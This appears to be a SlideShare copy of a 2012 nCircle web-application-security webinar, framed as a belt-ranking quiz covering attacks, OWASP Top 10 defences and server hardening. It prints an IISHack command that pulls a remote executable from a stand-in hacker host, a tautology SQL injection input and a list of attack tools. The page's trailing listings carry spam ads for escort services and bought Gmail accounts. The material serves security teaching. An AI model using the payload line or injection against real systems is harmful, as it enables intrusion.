SlideShare uma empresa Scribd logo

nCircle Webinar: Get your Black Belt

Transferir como PPTX, PDF
nCircle - a Tripwire Company
nCircle - a Tripwire Company

Get Your Black Belt in Web Application Security

NegóciosTecnologia
1 de 41
Get Your Black Belt in Web Application Security 26 April 2012 © 2012 nCircle. All rights reserved.
Web Server and Web Applications Security 2 © 2012 nCircle. All rights reserved.
Why Web Servers and Web Applications are hard to Defend Why is attacking a web server or web applications one of the easiest attack methods? – On the perimeter – Accessible by anyone on the Internet – Need to balance functionality with security – Port 80 and port 443 (can‟t just block them) – Lack of security awareness of many web developers – High level of traffic. Hard to distinguish an attack from high volumes of legitimate traffic 3 © 2012 nCircle. All rights reserved.
Typical Attack Steps against a Web Server 1. Reconnaissance (passive) 2. Scanning and enumeration (active) 3. Gaining Access (exploit) 4. Escalation of privilege 5. Maintain access 6. Covering tracks and placing backdoors 4 © 2012 nCircle. All rights reserved.
Two Methods of Attack: The Web Server and Web Applications • Web Server Attacks – Vulnerabilities in the web server or web server configuration • Examples: Buffer Overflows, Traversals • Web Application Attacks – Vulnerabilities in web applications • Command Injection • XSS (Cross Site Scripting) 5 © 2012 nCircle. All rights reserved.
Ichi (one) With respect to defending against web attacks what is problem with port 80 with respect to security? a. It is the default TFTP port b. It can be closed c. It is not a well-known port d. It can‟t be blocked Difficulty: Easy/Medium 6 © 2012 nCircle. All rights reserved.
Ni (two) For an attack to work on a web server or a web application what does it need to have? a. An exploit b. A risk c. A vulnerability d. A configuration Difficulty: Easy/Medium 7 © 2012 nCircle. All rights reserved.
Congratulations on your new Yellow Belt! You have attained the WebApp rank of 7th Kyu. 8 © 2012 nCircle. All rights reserved.
Web Server Attacks 9 © 2012 nCircle. All rights reserved.
Buffer Overflow Attack A buffer overflow attack allows an attacker to overwrite code in the program‟s execution path and thus take control of the program to execute the attacker‟s code. Cause: Poor boundary checking (checking whether a variable is within some bounds before its use) Example: IISHack.exe  Exploits the IIS http daemon buffer. Below is a sample: c: iishack www.WebserverA.com 80 www.hackserver.com/mal.exe 10 © 2012 nCircle. All rights reserved.
Web Server File System Traversal Attacks • Clients are permitted access to only a specific partition of the server file system, known as the web document root directory. • By modifying a website URL, a hacker can perform a file system traversal and obtain access to files on other parts of the server. • Attack is initiated by inserting special characters in URLs, for example, ../ sequence. • Encoding can be used to bypass Web server filtering. 11 © 2012 nCircle. All rights reserved.
San (three) Which one of the following is NOT one of the typical attacks used against a web server like Apache? a. ARP poisoning b. Buffer overflow c. Source disclosure d. File system traversal Difficulty: Easy/Medium 12 © 2012 nCircle. All rights reserved.
Shi (four) A web server attack that involves a hacker gaining access to restricted areas and files on a web server is known as which type of attack? a. Buffer boundary b. File system traversal c. Encryption d. File overflow Difficulty: Easy/Medium 13 © 2012 nCircle. All rights reserved.
Congratulations on your new Blue Belt! You have attained the WebApp rank of 4th Kyu. 14 © 2012 nCircle. All rights reserved.
Web Application Attacks 15 © 2012 nCircle. All rights reserved.
OWASP Top 10 (2010 List) – www.owasp.org OWASP Top 10 Categories A1-Injection A2-Cross Site Scripting (XSS) A3-Broken Authentication/Session Management A4-Insecure Direct Object References A5-Cross Site Request Forgery (CSRF) A6-Security Misconfiguration A7-Insecure Cryptographic Storage A8-Failure to Restrict URL Access A9-Insufficient Transport Layer Encryption A10-Unvalidated Redirects and Forwards 16 © 2012 nCircle. All rights reserved.
Injection (Command Injection – OWASP A1) • Occurs when untrusted data is sent to a command interpreter as part of a command or query. • Cleverly formed data can trick the command interpreter to performing unintended commands or revealing unintended information • Examples of command injection: – SQL Injection – Script Injection – Any web application that accepts input is potentially vulnerable to injection attacks. Injection is usually done by changing the data in the parameters that are passed into a program 17 © 2012 nCircle. All rights reserved.
SQL Injection (Valid Data) As an example the user enters Jill and Brown into two input fields on a web page The program takes this input into the CustID variable and dynamically creates the query string : „SELECT * FROM accounts WHERE customerID = Jill_Brown‟ The program then sends this SQL query to the SQL database and the SQL database then retrieves and displays Jill Brown‟s record as expected. 18 © 2012 nCircle. All rights reserved.
SQL Injection (Invalid Data) The user enters Jane and Doe‟ OR „1‟=„1 on the web page The program takes this input and dynamically creates the query string : „SELECT * FROM accounts WHERE customerID = Jane_Doe‟ OR „1‟=„1‟ The program send this SQL query to the SQL database and it then retrieves ALL of the records in the database accounts table – NOT as expected  19 © 2012 nCircle. All rights reserved.
Defenses Against SQL Injection • Prepared Statements (parameterized queries) • Stored Procedures • Escaping all user supplied input • Least privilege • White list input validation Reference: OWASP SQL Injection Prevention Cheat Sheet (www.owasp.org) 20 © 2012 nCircle. All rights reserved.
Cross Site Scripting (XSS – OWASP A2) • Cross-Site Scripting attacks are a type of injection attack, in which malicious scripts are injected into the otherwise benign and trusted web sites. Injection occurs usually by inserting untrusted data in a user‟s browser via a web page request. Untrusted data 21 © 2012 nCircle. All rights reserved.
Defenses Against XSS Primary defense: Escaping untrusted data “Escaping” is a technique used to ensure that characters are treated as data, not as characters that are relevant to the interpreter's parser. Rule #0 : Never put untrusted data (in a web page) Except in Allowed Locations Rule #1 : HTML Escape Before Inserting Untrusted Data Except into HTML Element Content Rules #2 - #7 : These rules deal with exceptions if you put untrusted data in “Unallowed” locations Reference: OWASP XSS Prevention Cheat Sheet (www.owasp.org) 22 © 2012 nCircle. All rights reserved.
Broken Authentication and Session Management (OWASP A3) • Web Application functions related to authentication and/or session management (passwords, keys, cookies, tokens, session ids) are poorly implemented allowing an attacker to assume someone else's identity. 23 © 2012 nCircle. All rights reserved.
Defenses Against Broken Authentication and Session Management • Secure management of session identifiers – Do not put session identifiers in the URL – Session IDs should have a timeout feature • Do not allow the login process to execute from an unencrypted page • Password Change Controls • Password use / strength / storage • Reference: OWASP Session Management and Authentication Cheat Sheets (www.owasp.org) 24 © 2012 nCircle. All rights reserved.
Go (five) An web application attack that focuses on the database application of a web server and enables a hacker to acquire sensitive information stored in the database is which one of the following? a. Sequence infiltration b. SQL injection c. Cookie poisoning d. Hidden parameter exploit Difficulty: Easy/Medium 25 © 2012 nCircle. All rights reserved.
Roku (six) What is one of the defenses against SQL Injection? a. Least Privilege b. Black list input validation c. Sanitization d. Proxy manipulation Difficulty: Easy/Medium 26 © 2012 nCircle. All rights reserved.
Congratulations on your new advanced Blue Belt rank! You have attained the WebApp rank of 2nd Kyu. 27 © 2012 nCircle. All rights reserved.
Web Server and Web Application Defense Tools 28 © 2012 nCircle. All rights reserved.
Web Server and Application Defense Tools (1 of 2) • Scanning and mapping tools • Ping, Nping, Nmap, Amap, SuperScan, … • Vulnerability and Web vulnerability scanners • Nikto, Wikto, Nessus, w3af, IP360, WebInspect, Sentinel, WebApp360, Cenzic, Fortify, … • Web proxy tools • WebScarab, Paros Proxy, Burp Proxy, … • Web mapping/ripping tools • Black Widow, Wget, skipfish, … • Communication/data transfer tools • Ncat, telnet, ftp, …. • Exploits, Exploit Kits, and Exploit Frameworks • Program for a specific exploit • Pen Test frameworks: Metasploit, Core Impact, CANVAS 29 © 2012 nCircle. All rights reserved.
Web Server and Application Defense Tools (2 of 2) • Password cracking tools • John the Ripper, Cain and Abel, PRTK, ophcrack, … • Web Source Code examination tools: • Instant Source, Firebug, …. • SQL Injection Tools • BSQL Hacker, The Mole, sqlmap, Pangolin, … 30 © 2012 nCircle. All rights reserved.
Network Defense Tools (Protecting the Web Server) • Routers • Firewalls (network layer) • Web Application Firewalls (application layer) • Web Application Proxies • Honeypots/Honeynets • Logging • Intrusion Detection/Prevention System (IDS/IPS) • Host-based Intrusion Detection (HIDS), e.g. file integrity detection • Backups • Computer Forensic Tools 31 © 2012 nCircle. All rights reserved.
Web Server Protection • Protect the Web Server • Vulnerability Assessment • Harden the Web Server – Host (OS) – Web Server – Web Services • Logging • Backups and recovery 32 © 2012 nCircle. All rights reserved.
Place the Web Sever in an Untrusted Zone 33 © 2012 nCircle. All rights reserved.
Security Harden the Web Server (1 of 2) • Use Security Hardening Guides (Vendor documentation, OWASP, SANS, NIST, WASC) • Host (OS) hardening • Web Server hardening – Use tools like IIS Lockdown and URLscan – Harden each service you offer on your Web Server – Disable / remove anything you don‟t use or need: accounts, ports, services, accounts, plug-ins – Configuration settings – Permissions 34 © 2012 nCircle. All rights reserved.
Security Harden the Web Server (2 of 2) • Authentication and Access Control – File and directory permissions – Account password and lockout policies • Logging and Audit Policies • Vulnerability and Compliance Assessments – Vulnerability scanner – Web application vulnerability scanner – Configuration scanner – Audits for compliance assessments – Penetration testing / manual testing 35 © 2012 nCircle. All rights reserved.
Web Server Attack Countermeasures • Buffer Overflow – Can be mitigated by conducting frequent scans for server vulnerabilities – Prompting acquiring and installing patches and service packs – Implementing effective firewalls – Applying web configuration lockdown utilities • File System Traversal – Promptly apply patches and updates to the web server – Restrict privileges to executable programs such as cmd.exe – Set file and directory permissions – Locate the system software on a different disk drive from the web site software and content directory. 36 © 2012 nCircle. All rights reserved.
Shichi (seven) Tools such as Nmap and Amap are used primarily for which one of the following Web attack steps? a. Banner grabbing b. Defeating authentication c. Scanning d. Password Cracking Difficulty: Medium/Hard 37 © 2012 nCircle. All rights reserved.
Hachi (eight) What is a good tool to help harden an IIS web server? (choose the best answer) a. Cain and Abel b. URLscan c. ncat d. WebScarab Difficulty: Medium/Hard 38 © 2012 nCircle. All rights reserved.
Congratulations on your new Black Belt! You have attained the WebApp rank of 1st Dan 39 © 2012 nCircle. All rights reserved.
Resources • OWASP (Open Web Application Security Project) www.owasp.org • NIST (National Institute of Standards and Technology) www.nist.gov • SANS www.sans.org • Web Application Security Consortium (WASC) www.webappsec.org • SecTools.org http://sectools.org 40 © 2012 nCircle. All rights reserved.
Questions? 41 © 2012 nCircle. All rights reserved.

Recomendados

Securing and Managing the Oracle HTTP Server
Securing and Managing the Oracle HTTP ServerSecuring and Managing the Oracle HTTP Server
Securing and Managing the Oracle HTTP ServerSecureDBA
 
DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)Soham Kansodaria
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Beyond the OWASP Top 10
Beyond the OWASP Top 10Beyond the OWASP Top 10
Beyond the OWASP Top 10iphonepentest
 
Network penetration testing
Network penetration testingNetwork penetration testing
Network penetration testingImaginea
 
Security_Testing_Presentation
Security_Testing_PresentationSecurity_Testing_Presentation
Security_Testing_PresentationRazil Shaik
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10Aravindharamanan S
 
t r
t rt r
t relectronicmingle01
 

Recomendados

Securing and Managing the Oracle HTTP Server
Securing and Managing the Oracle HTTP ServerSecuring and Managing the Oracle HTTP Server
Securing and Managing the Oracle HTTP ServerSecureDBA
 
DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)Soham Kansodaria
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Beyond the OWASP Top 10
Beyond the OWASP Top 10Beyond the OWASP Top 10
Beyond the OWASP Top 10iphonepentest
 
Network penetration testing
Network penetration testingNetwork penetration testing
Network penetration testingImaginea
 
Security_Testing_Presentation
Security_Testing_PresentationSecurity_Testing_Presentation
Security_Testing_PresentationRazil Shaik
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10Aravindharamanan S
 
t r
t rt r
t relectronicmingle01
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...IBM Security
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
OWASP TOP 10
OWASP TOP 10OWASP TOP 10
OWASP TOP 10Robert MacLean
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017Aaron Hnatiw
 
Securing and Managing the Oracle HTTP Server - White Paper
Securing and Managing the Oracle HTTP Server - White PaperSecuring and Managing the Oracle HTTP Server - White Paper
Securing and Managing the Oracle HTTP Server - White PaperSecureDBA
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Web Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationWeb Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationSandro Gauci
 
Web Hacking
Web HackingWeb Hacking
Web HackingInformation Technology
 
Web application penetration testing
Web application penetration testingWeb application penetration testing
Web application penetration testingImaginea
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps SecurityVictor Bucutea
 
Axoss Web Application Penetration Testing Services
Axoss Web Application Penetration Testing ServicesAxoss Web Application Penetration Testing Services
Axoss Web Application Penetration Testing ServicesBulent Buyukkahraman
 
Secure Coding for Java - An Introduction
Secure Coding for Java - An IntroductionSecure Coding for Java - An Introduction
Secure Coding for Java - An IntroductionSebastien Gioria
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Secure code practices
Secure code practicesSecure code practices
Secure code practicesHina Rawal
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityRichard Peter Ong
 
PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014Haitham Raik
 
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...Quek Lilian
 
Sql injections (Basic bypass authentication)
Sql injections (Basic bypass authentication)Sql injections (Basic bypass authentication)
Sql injections (Basic bypass authentication)Ravindra Singh Rathore
 

Mais conteúdo relacionado

Mais procurados

Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...IBM Security
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017Aaron Hnatiw
 
Securing and Managing the Oracle HTTP Server - White Paper
Securing and Managing the Oracle HTTP Server - White PaperSecuring and Managing the Oracle HTTP Server - White Paper
Securing and Managing the Oracle HTTP Server - White PaperSecureDBA
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Web Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationWeb Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationSandro Gauci
 
Web application penetration testing
Web application penetration testingWeb application penetration testing
Web application penetration testingImaginea
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
Axoss Web Application Penetration Testing Services
Axoss Web Application Penetration Testing ServicesAxoss Web Application Penetration Testing Services
Axoss Web Application Penetration Testing ServicesBulent Buyukkahraman
 
Secure Coding for Java - An Introduction
Secure Coding for Java - An IntroductionSecure Coding for Java - An Introduction
Secure Coding for Java - An IntroductionSebastien Gioria
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Secure code practices
Secure code practicesSecure code practices
Secure code practicesHina Rawal
 
PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014Haitham Raik
 

Mais procurados (20)

Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
 
OWASP TOP 10
OWASP TOP 10OWASP TOP 10
OWASP TOP 10
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017
 
Securing and Managing the Oracle HTTP Server - White Paper
Securing and Managing the Oracle HTTP Server - White PaperSecuring and Managing the Oracle HTTP Server - White Paper
Securing and Managing the Oracle HTTP Server - White Paper
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Web Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationWeb Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And Exploitation
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
 
Web application penetration testing
Web application penetration testingWeb application penetration testing
Web application penetration testing
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive Controls
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
 
Axoss Web Application Penetration Testing Services
Axoss Web Application Penetration Testing ServicesAxoss Web Application Penetration Testing Services
Axoss Web Application Penetration Testing Services
 
Secure Coding for Java - An Introduction
Secure Coding for Java - An IntroductionSecure Coding for Java - An Introduction
Secure Coding for Java - An Introduction
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Secure code practices
Secure code practicesSecure code practices
Secure code practices
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014
 

Semelhante a nCircle Webinar: Get your Black Belt

MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...Quek Lilian
 
Sql injections (Basic bypass authentication)
Sql injections (Basic bypass authentication)Sql injections (Basic bypass authentication)
Sql injections (Basic bypass authentication)Ravindra Singh Rathore
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelinesZakaria SMAHI
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010Aditya K Sood
 
Web Application Scanning 101
Web Application Scanning 101Web Application Scanning 101
Web Application Scanning 101Sasha Nunke
 
Security in the cloud protecting your cloud apps
Security in the cloud protecting your cloud appsSecurity in the cloud protecting your cloud apps
Security in the cloud protecting your cloud appsCenzic
 
Top Application Security Trends of 2012
Top Application Security Trends of 2012Top Application Security Trends of 2012
Top Application Security Trends of 2012DaveEdwards12
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015devObjective
 
A DevOps Guide to Web Application Security
A DevOps Guide to Web Application SecurityA DevOps Guide to Web Application Security
A DevOps Guide to Web Application SecurityImperva Incapsula
 
Ce hv6 module 42 hacking database servers
Ce hv6 module 42 hacking database serversCe hv6 module 42 hacking database servers
Ce hv6 module 42 hacking database serversAmiga Utomo
 
Ce Hv6 Module 42 Hacking Database Servers
Ce Hv6 Module 42 Hacking Database ServersCe Hv6 Module 42 Hacking Database Servers
Ce Hv6 Module 42 Hacking Database ServersKislaychd
 

Semelhante a nCircle Webinar: Get your Black Belt (20)

MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
 
Sql injections (Basic bypass authentication)
Sql injections (Basic bypass authentication)Sql injections (Basic bypass authentication)
Sql injections (Basic bypass authentication)
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
Web security 2012
Web security 2012Web security 2012
Web security 2012
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010
 
Web Application Scanning 101
Web Application Scanning 101Web Application Scanning 101
Web Application Scanning 101
 
Security in the cloud protecting your cloud apps
Security in the cloud protecting your cloud appsSecurity in the cloud protecting your cloud apps
Security in the cloud protecting your cloud apps
 
OWASP TOP 10 VULNERABILITIS
OWASP TOP 10 VULNERABILITISOWASP TOP 10 VULNERABILITIS
OWASP TOP 10 VULNERABILITIS
 
Top Application Security Trends of 2012
Top Application Security Trends of 2012Top Application Security Trends of 2012
Top Application Security Trends of 2012
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015
 
Unit 08: Security for Web Applications
Unit 08: Security for Web ApplicationsUnit 08: Security for Web Applications
Unit 08: Security for Web Applications
 
Web hackingtools cf-summit2014
Web hackingtools cf-summit2014Web hackingtools cf-summit2014
Web hackingtools cf-summit2014
 
OWASP Top Ten in Practice
OWASP Top Ten in PracticeOWASP Top Ten in Practice
OWASP Top Ten in Practice
 
Web Security
Web SecurityWeb Security
Web Security
 
A DevOps Guide to Web Application Security
A DevOps Guide to Web Application SecurityA DevOps Guide to Web Application Security
A DevOps Guide to Web Application Security
 
Web Security
Web SecurityWeb Security
Web Security
 
Ce hv6 module 42 hacking database servers
Ce hv6 module 42 hacking database serversCe hv6 module 42 hacking database servers
Ce hv6 module 42 hacking database servers
 
Ce Hv6 Module 42 Hacking Database Servers
Ce Hv6 Module 42 Hacking Database ServersCe Hv6 Module 42 Hacking Database Servers
Ce Hv6 Module 42 Hacking Database Servers
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
 

Mais de nCircle - a Tripwire Company

Google-Jacking: A Review of Google 2-Factor Authentication
Google-Jacking: A Review of Google 2-Factor AuthenticationGoogle-Jacking: A Review of Google 2-Factor Authentication
Google-Jacking: A Review of Google 2-Factor AuthenticationnCircle - a Tripwire Company
 
2012 nCircle Federal Security and Compliance Trends Survey
2012 nCircle Federal Security and Compliance Trends Survey 2012 nCircle Federal Security and Compliance Trends Survey
2012 nCircle Federal Security and Compliance Trends Survey nCircle - a Tripwire Company
 
Applying Boyd's OODA Loop Strategy to Drive IT Security Decision and Action
Applying Boyd's OODA Loop Strategy to Drive IT Security Decision and ActionApplying Boyd's OODA Loop Strategy to Drive IT Security Decision and Action
Applying Boyd's OODA Loop Strategy to Drive IT Security Decision and ActionnCircle - a Tripwire Company
 

Mais de nCircle - a Tripwire Company (9)

Computer Forensics Bootcamp
Computer Forensics BootcampComputer Forensics Bootcamp
Computer Forensics Bootcamp
 
Google-Jacking: A Review of Google 2-Factor Authentication
Google-Jacking: A Review of Google 2-Factor AuthenticationGoogle-Jacking: A Review of Google 2-Factor Authentication
Google-Jacking: A Review of Google 2-Factor Authentication
 
Password War Games Webinar
Password War Games Webinar Password War Games Webinar
Password War Games Webinar
 
Continuous Monitoring 2.0
Continuous Monitoring 2.0Continuous Monitoring 2.0
Continuous Monitoring 2.0
 
2012 nCircle Federal Security and Compliance Trends Survey
2012 nCircle Federal Security and Compliance Trends Survey 2012 nCircle Federal Security and Compliance Trends Survey
2012 nCircle Federal Security and Compliance Trends Survey
 
Applying Boyd's OODA Loop Strategy to Drive IT Security Decision and Action
Applying Boyd's OODA Loop Strategy to Drive IT Security Decision and ActionApplying Boyd's OODA Loop Strategy to Drive IT Security Decision and Action
Applying Boyd's OODA Loop Strategy to Drive IT Security Decision and Action
 
Compliance what does security have to do with it
Compliance what does security have to do with it Compliance what does security have to do with it
Compliance what does security have to do with it
 
Security on a budget
Security on a budget Security on a budget
Security on a budget
 
Real world security webinar (v2012-05-30)
Real world security webinar (v2012-05-30)Real world security webinar (v2012-05-30)
Real world security webinar (v2012-05-30)
 

Último

International Business Environments and Operations 16th Global Edition test b...
International Business Environments and Operations 16th Global Edition test b...International Business Environments and Operations 16th Global Edition test b...
International Business Environments and Operations 16th Global Edition test b...ssuserf63bd7
 
APRIL2024_UKRAINE_xml_0000000000000 .pdf
APRIL2024_UKRAINE_xml_0000000000000 .pdfAPRIL2024_UKRAINE_xml_0000000000000 .pdf
APRIL2024_UKRAINE_xml_0000000000000 .pdfRbc Rbcua
 
FULL ENJOY Call girls in Paharganj Delhi | 8377087607
FULL ENJOY Call girls in Paharganj Delhi | 8377087607FULL ENJOY Call girls in Paharganj Delhi | 8377087607
FULL ENJOY Call girls in Paharganj Delhi | 8377087607dollysharma2066
 
Kenya’s Coconut Value Chain by Gatsby Africa
Kenya’s Coconut Value Chain by Gatsby AfricaKenya’s Coconut Value Chain by Gatsby Africa
Kenya’s Coconut Value Chain by Gatsby Africaictsugar
 
Innovation Conference 5th March 2024.pdf
Innovation Conference 5th March 2024.pdfInnovation Conference 5th March 2024.pdf
Innovation Conference 5th March 2024.pdfrichard876048
 
Annual General Meeting Presentation Slides
Annual General Meeting Presentation SlidesAnnual General Meeting Presentation Slides
Annual General Meeting Presentation SlidesKeppelCorporation
 
Organizational Structure Running A Successful Business
Organizational Structure Running A Successful BusinessOrganizational Structure Running A Successful Business
Organizational Structure Running A Successful BusinessSeta Wicaksana
 
Intro to BCG's Carbon Emissions Benchmark_vF.pdf
Intro to BCG's Carbon Emissions Benchmark_vF.pdfIntro to BCG's Carbon Emissions Benchmark_vF.pdf
Intro to BCG's Carbon Emissions Benchmark_vF.pdfpollardmorgan
 
Kenya Coconut Production Presentation by Dr. Lalith Perera
Kenya Coconut Production Presentation by Dr. Lalith PereraKenya Coconut Production Presentation by Dr. Lalith Perera
Kenya Coconut Production Presentation by Dr. Lalith Pereraictsugar
 
Independent Call Girls Andheri Nightlaila 9967584737
Independent Call Girls Andheri Nightlaila 9967584737Independent Call Girls Andheri Nightlaila 9967584737
Independent Call Girls Andheri Nightlaila 9967584737Riya Pathan
 
Buy gmail accounts.pdf Buy Old Gmail Accounts
Buy gmail accounts.pdf Buy Old Gmail AccountsBuy gmail accounts.pdf Buy Old Gmail Accounts
Buy gmail accounts.pdf Buy Old Gmail AccountsBuy Verified Accounts
 
Call US-88OO1O2216 Call Girls In Mahipalpur Female Escort Service
Call US-88OO1O2216 Call Girls In Mahipalpur Female Escort ServiceCall US-88OO1O2216 Call Girls In Mahipalpur Female Escort Service
Call US-88OO1O2216 Call Girls In Mahipalpur Female Escort Servicecallgirls2057
 
8447779800, Low rate Call girls in Saket Delhi NCR
8447779800, Low rate Call girls in Saket Delhi NCR8447779800, Low rate Call girls in Saket Delhi NCR
8447779800, Low rate Call girls in Saket Delhi NCRashishs7044
 
Call Girls in DELHI Cantt, ( Call Me )-8377877756-Female Escort- In Delhi / Ncr
Call Girls in DELHI Cantt, ( Call Me )-8377877756-Female Escort- In Delhi / NcrCall Girls in DELHI Cantt, ( Call Me )-8377877756-Female Escort- In Delhi / Ncr
